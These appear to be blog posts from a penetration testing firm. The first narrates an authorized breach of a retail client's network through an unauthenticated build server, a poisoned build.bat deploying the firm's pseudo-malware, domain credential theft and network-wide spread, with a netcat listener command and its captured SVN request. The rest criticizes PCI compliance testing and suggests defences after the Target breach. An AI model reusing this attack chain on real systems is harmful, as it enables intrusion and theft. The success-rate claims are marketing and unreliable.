The Truth About Breaching Retail Networks

How we breached a retail network using our manual penetration testing methodology

Netragard
We recently delivered an Advanced Persistent Threat  (APT) Penetration Test to one of our customers. People who know us know that when we say APT we’re not just using buzz words.  Our APT services maintain a 98% success rate at compromise while our unrestricted methodology maintains a 100% success at compromise to date.  (In fact we offer a challenge to back up our stats.  If we don’t penetrate with our unrestricted methodology then your test is free.)  Lets begin the story about a large retail customer that wanted our APT services.
When we deliver covert engagements we don’t use the everyday and largely ineffective low and slow methodology.  Instead, we use a realistic offensive methodology that incorporates distributed scanning, the use of custom tools, zero-day malware (RADON) among other things.  We call this methodology Real Time Dynamic Testing™ because it’s delivered in real time and is dynamic.  At the core of our methodology are components normally reserved for vulnerability research and exploit development.  Needless to say, our methodology has teeth.
Our customer (the target) wanted a single /23 attacked during the engagement. The first thing that we did was to perform reconnaissance against the /23 so that we knew what we were up against.  Reconnaissance in this case involved distributed scanning and revealed a large number of http and https services running on 149 live targets.  The majority of the pages were uninteresting and provided static content while a few provided dynamic content.
While evaluating the dynamic pages we came across one that was called Make Boss. The application was appeared to be custom built for the purpose of managing software builds. What really snagged our attention was that this application didn’t support any sort of authentication.  Instead anyone who visited the page had access to use the application.
We quickly noticed that the application allowed us to generate new projects.  Then we noticed that we could point those new projects at any SVN or GIT repo local or remote.  We also identified a hidden questionable page named “list-dir.php” that enabled us to list the contents of any directory that the web server had permission to access.
We used “list-dir.php” to enumerate local users by guessing the contents of “C:\document~1” (Documents and Settings folder). In doing so we identified useful directories like “C:\MakeBoss\Source” and “C:\MakeBoss\Compiled”.  The existence of these directories told us that projects were built on and fetched from same server.
The next step was to see if in fact we could get the Make Boss application to establish a connection with a repository that we controlled.  To do this we setup an external listener using netcat at our lab .  Then we configured a new project called “_Netragard” in Make Boss in such a way that it would connect to our listener. The test was a success as is shown by the redacted output below.

[[email protected]:~]$ nc -l -p 8888 -v
listening on [any] 8888 …
xx.xx.xx.xx: inverse host lookup failed: Unknown server error : Connection timed out
connect to [xx.xx.xx.xx] from (UNKNOWN) [xx.xx.xx.xx] 1028
OPTIONS / HTTP/1.1
Host: lab1.netragard.com:8888
User-Agent: SVN/1.6.4 (r38063) neon/0.28.2
Keep-Alive:
Connection: TE, Keep-Alive
TE: trailers
Content-Type: text/xml
Accept-Encoding: gzip
DAV: http://subversion.tigris.org/xmlns/dav/svn/depth
DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo
DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revpropsContent-Length: 104
Accept-Encoding: gzip
 
<?xml version=”1.0″ encoding=”utf-8″?><D:options xmlns:D=”DAV:”><D:activity-collection-set/></D:options>

With communications verified we setup a real instance of SVN and created a weaponized build.bat file.  We selected the build.bat because we knew that Make Boss would execute the build.bat server-side and if done right we could use it to infect the system. (A good reference for setting up subversion can be found here  http://subversion.apache.org/quick-start).  Our initial attempts at getting execution failed due to file system permissions.  We managed to get successful execution of our build.bat by changing our target directory to “C:\TEMP” rather than working from the standard webserver directories.
With execution capabilities verified we modified our build.bat file so that it would deploy RADON (our home-grown 0-day pseudo-malware).  We used Make Boss to fetch and run our weaponized build.bat, which in turn infected the server running the Make Boss application.  Within seconds of infection our Command & Control server received a connection from the Make Boss server.  This represented our first point of penetration.
A note about RADON…
RADON is “safe” as far as malware goes because each strand is built with a pre-defined expiration date.  During this engagement RADON was set to expire 5 days after strand generation.  When RADON expires it quietly and cleanly self-destructs leaving the infected system in its original state which is more than what can be said for other “whitehat” frameworks (like Metasploit, etc).
RADON is also unique in that it’s designed for our highest-threat engagements (nation-state style).  By design RADON will communicate over both known and unknown covert channels.  Known channels are used for normal operation while covert channels are used for more specialized engagements.  All variants of RADON can be switched from known to covert and visa-versa from the Command & Control server.
Finally, it’s almost impossible to disrupt communication between RADON and its Command & Control center.  This is in part because of the way that RADON leverages key protocols that all networks depend on to operate.  Because of this, disrupting RADON’s covert channels would also disrupt all network functionality.
Back to the hack…
With the system infected by RADON we were able to take administrative control of the Make Boss server.  From there we identified domain administrator credentials that the server was happy to relinquish. We used those credentials to authenticate to and extract all current and historical passwords from the domain controller.   Then we used one of our specialized GPU password cracking machines to process the hashes and deliver us the keys to the kingdom.
With that accomplished we had established dominant network position. From this position we were able to propagate RADON to all endpoints and affect an irrecoverable network compromise.  Irrecoverable if we were the bad guys of course, but luckily we’re the good guys and our customer recovered just fine.  Never the less we had access to everything including but not limited to desktops, points of sale, web servers, databases, network devices, etc.
Not surprisingly our customers managed security service provider didn’t detect any of our activity, not even the mass infection.  They did however detect what we did next…
As a last step and to satisfy our customer we ran two different popular vulnerability scanners.  These are the same scanners that most penetration testing vendors rely on to deliver their services.  One of the scanners is more network centric and the other combines network and web application scanning.  Neither of the scanners identified a single viable vulnerability despite the existence of the (blatantly obvious) one that we exploited above.  The only things that were reported were informational findings like “port 80 open”, “deprecated SSL”, etc.
It’s really important to consider this when thinking about the breaches suffered by businesses like Hannaford, Sony, Target, Home Depot and so many.  If the penetration tests that you receive are based on the product of vulnerability scanners and those scanners fail to detect the most obvious vulnerabilities then where does that leave you?  Don’t be fooled by testers that promise to deliver “manual penetration tests” either.  In most cases they just vet scan reports and call the process of vetting “manual testing” which it isn’t.

Custom Security Projects

What you don’t know about compliance…

People are always mystified by how hackers break into major networks like Target, Hannaford, Sony, (government networks included), etc.  They always seem to be under the impression that hackers have some elite level of skill.  The truth is that it doesn’t take any skill to break into most networks because they aren’t actually protected. Most network owners don’t care about security because they don’t perceive the threat as real.  They suffer from the “it won’t ever happen to me” syndrome.
As a genuine penetration testing company we take on dozens of new opportunities per month.  Amazingly, roughly 80% of businesses that request services don’t want quality security testing, they want a simple check in the compliance box. They perceive quality security testing as an unnecessary and costly annoyance that stands in the way of new revenue.  These businesses test because they are required to, not because they want to.  These requirements stem from partners, customers, and regulations that include but are not limited to PCI-DSS, HIPAA, etc.
Unfortunately these requirements make the problem worse rather than better.  For example, while PCI requires merchants to receive penetration tests it completely fails to provide any effective or realistic baseline against which to measure the test results.  This is also true of HIPAA and other third party testing requirements.  To put this into perspective, if the National Institute of Justice set their V50 or V0 standards in the same manner then it would be adequate and acceptable to test bulletproof vests with  squirt guns.  Some might argue that poor testing is better than nothing but we’d disagree.  Testing at less than realistic levels of threat does nothing to prevent the real threat from penetrating.
Shoddy testing requirements and a general false sense of security have combined to create a market where check in the box needs take priority over genuine security.  Vendors that sell into this market compete based on cost, free service add-ons and free software licenses rather than quality of service and team capability, and price illogically based on IP count. Most testing vendors exacerbate the problem because they falsely advertise compliance testing (check in the box) services as best quality.  This creates and perpetuates a false sense of security among non-security expert customers and also lures in customers who have a genuine security need.
The dangers associated with this are evidenced by the many businesses that have suffered damaging compromises despite the fact that they are in compliance with various regulations.  The recent Target breach (certified as PCI compliant by Trustwave) is just one high-profile example.  Target’s former CEO, Gregg Steinhafel was quoted saying “Target was certified as meeting the standard for the payment card industry (PCI) in September 2013. Nonetheless, we suffered a data breach”.  Another high-profile example is the Hannaford breach (Rapid7’s customer at the time) back in 2008.  Hannaford, like Target, claims that they too were PCI compliant.
It’s our responsibility as security experts to deliver truth to our customers rather than to bank on their lack of expertise.  Sure we’re in this to make money but we also have an ethical responsibility.  If we take the time to educate our customers about the differences between compliance testing and genuine penetration testing and they still select compliance testing then that’s fine (its their risk).  But if we lie to our customers and sell them compliance testing while we assert that it’s best in class then we should be held responsible.  After all, it’s our job to protect people isn’t it?
The irony is that Compliance testing typically cost more than genuine penetration testing because it uses an arbitrary count based pricing methodology.  Specifically, if customer has 10 IP addresses but only 1 of those IP addresses is live the customer will still be billed for testing all 10 IP addresses.  Genuine penetration testing costs less because it uses an Attack Surface Pricing (ASP) methodology.  If a customer has 10 IP addresses and only one is live then ASP will identify that and the customer will only be charged for that 1 IP.  Moreover, the customer will be charged based on the complexity of the services provided by that one IP.
If the Return on Investment (RoI) of good security is equal to the cost in damages of a single successful compromise and if quality penetration testing services cost less (on average) than compliance testing services, doesn’t it make sense to purchase quality penetration testing services?
 

The Truth About PCI Compliance. What They Don’t Want You To Know

All of the recent news about Target, Neiman Marcus, and other businesses being hacked might be a surprise to many but it’s no surprise to us. Truth is that practice of security has devolved into a political image focused designed satisfy technically inept regulatory requirements that do little or nothing to protect critical business assets. What’s worse is that many security companies are capitalizing on this devolution rather than providing effective solutions in the spirit of good security. This is especially true with regards to the penetration testing industry.

We all know that money is the lifeblood of business and that a failure to meet regulatory requirements threatens that lifeblood. After all, when a business is not in compliance it runs the risk of being fined or not being allowed to operate. In addition the imaginary expenses associated with true security are often perceived as a financial burden (another lifeblood threat). This is usually because the RoI of good security is only apparent when a would-be compromise is prevented. Too many business managers are of the opinion that “it won’t happen to us” until they become a target and it does. These combined ignorant views degrade the overall importance of real security and make the satisfaction of regulatory requirements the top priority. This is unfortunate given that compliance often has little to do with actual security.

Most regulatory requirements are so poorly defined they can be satisfied with the most basic solution. For example PCI-DSS requires merchants to undergo regular penetration tests and yet it completely fails to define the minimum level of threat (almost synonymous with quality) that those tests should be delivered at. This lack of clear definition gives business owners the ability to satisfy compliance with the cheapest most basic of testing services. To put this into perspective, if the standards used to test bulletproof vests (NIJ and HOSDB test methods) were replaced by PCI–DSS then bulletproof vest testing could be satisfied with a squirt gun.

These substandard regulatory requirements combined with business owners lacking in true security expertise formed a market where exceedingly low quality, low-threat, easy to deliver security-testing services are in high-demand. This market has been answered by a horde of self-proclaimed security experts that in almost all cases are little more than marginally capable script-kids and yet they inaccurately market their services as best in class. Take away their third party tools (scripts, scanners, Metasploit, etc.) and those vendors will be dead in the water. Take the tools away from a bona fide researcher or hacker and they’ll write new tools then hack you with a vengeance.

The saturation of the penetration testing industry with charlatans makes the process of identifying a quality vendor difficult for business managers that actually care about security. In many cases the consumer is a non-technical (or non-security expert) buyer and not able to truly assess the technical capabilities of the vendor. As a result they often make buy decisions based on the non-technical exploration of things like the number customers serviced, annual revenue, size of company, etc. While these are important factors when evaluating any business, they are by no means a measure of service quality and testing vendor capability. With regards to penetration testing services, quality of service is of the utmost importance and it is a highly technical matter. This is why we wrote a guide to vendor selection that sets a standard of quality and was featured on Forbes.

It is unfortunate that most business owners don’t seem to operate in spirit of good security but instead operate with revenue focused tunnel vision. The irony of this is that the cost of a quality penetration test is equal to a small fraction of the cost of a single successful compromise. For example, in 2011 Sony suffered a compromise that resulted in over 170 million dollars in damages (not including fines). This compromise was the result of the exploitation of a basic SQL Injection vulnerability in a web server (like Target). The average cost of Netragard’s web application penetration testing services in 2013 was $14,000.00 and our services would have detected the basic SQL Injection vulnerability that cost Sony so much money. Perhaps its time to rethink the value of genuine penetration testing? Clearly genuine penetration testing has a positive revenue impact through prevention. Specifically the Return on Investment of a genuine penetration test is equal to the cost in damages of a single successful compromise.

So what of Target.
We know that target was initially compromised through the exploitation of a vulnerability in one of their web servers (just like Sony and so many others). This vulnerability went unidentified for some time even after the initial malicious compromise. Why did malicious hackers find this vulnerability before Target? Why was Target unaware of their existing paths to both compromise data exfiltration? Who determined that Target was PCI compliant when PCI specifically requires environmental segregation and Target’s environment was clearly not properly segregated?

A path to compromise is the path that an attacker must take in order to access sensitive information. In the case of Target this information was cardholder data. The attackers had no issue exploiting a path to compromise and propagating their attack from their initial point of compromise to the Point of Sale terminals. The existence of the path to compromise should have resulted PCI failure, why didn’t it?

A path for data exfiltration is the method that an attacker uses to extract data from a compromised network. In the case of Target the attackers were able to extract a large amount of information before any sort of preventative response could be taken. This demonstrates that a path for data exfiltration existed and may still exist today. As with the path to compromise, the path for data exfiltration should have resulted in a PCI failure, why didn’t it?

We also know that Target’s own security monitoring capabilities were (and probably still are) terrible. Based on a Krebs on Security article, the hackers first uploaded malware to Targets points of sale. Then they configured a control server on Target’s internal network to which the malware would report cardholder data. Then the hackers would login to the control server remotely and repeatedly to download the stolen cardholder data. Why and how did target fail to detect this activity in time to prevent the incident?
If we use the little information that we have about Targets compromise as a light-weight penetration testing report we can provide some generic, high-level methods for remediation. What we’re suggesting here is hardly a complete solution (because the full details aren’t known) but it’s good advice nonetheless.

    • Deploy a web application firewall (ModSecuirty or something similar). This would address the issue of the web application compromise (in theory). If one is already deployed then it’s in need of a serious reconfiguration and whoever is charged with its monitoring and upkeep should be either trained properly or replaced (sorry). Most web application vulnerabilities are not exploited on the first try and their exploitation often generates significant noise. That noise likely went without notice in the case of Target.

 

    • Deploy a host-based monitoring solution on public facing servers. This would further address the issue of web server security and would help to prevent distributed metastasis. For companies that want an open source solution we’d suggest something like OSSEC with the appropriate active response configurations. For example, tuning OSSEC to monitor and react to system logs, web application firewall incidents, network intrusion incidents, etc. can be highly effective and its free. OSSEC can also be used to build blacklists of IP addresses that continually exhibit hostile behavior.

 

    • Deploy a network intrusion prevention solution (like snort) on the internal network at the demarcation points of the cardholder environment. If done properly this would help to block the path to compromise and path for data exfiltration. This solution should be tuned with custom rules to watch for any indication of cardholder data being transmitted out over the network. It should also be tuned to watch for anomalous connections that might be the product of rootkit’s, etc. In the event that something is detected it should respond in a way that ensures that the affected source and targets are isolated from the rest of network.

 

    • Deploy a second host based solution like bit9 on the Points of Sale (PoS). (No we’re not a reseller and have no affiliation with bit9). This solution should be deployed on the points of sale assuming that bit9 will run on them. This will address the issue of malware being deployed on the points of sale and being used to steal credit card information. Especially malware that was first created in 2013 (BlackPOS).

 

    • Hire a real Penetration Testing vendor. Given what we know about this compromise, Target hasn’t been selecting penetration testing vendors using the right criteria. Any genuine penetration testing vendor that delivers quality services at realistic levels of threat would have identified many of these issues. In fact, its fair to say that following the methods for remediation that come from a genuine penetration test would have prevented the compromise of cardholder data.

Finally, who do you think did a better job at testing, the hackers that compromised Target or the Penetration Testing firm that said that they were PCI Compliant?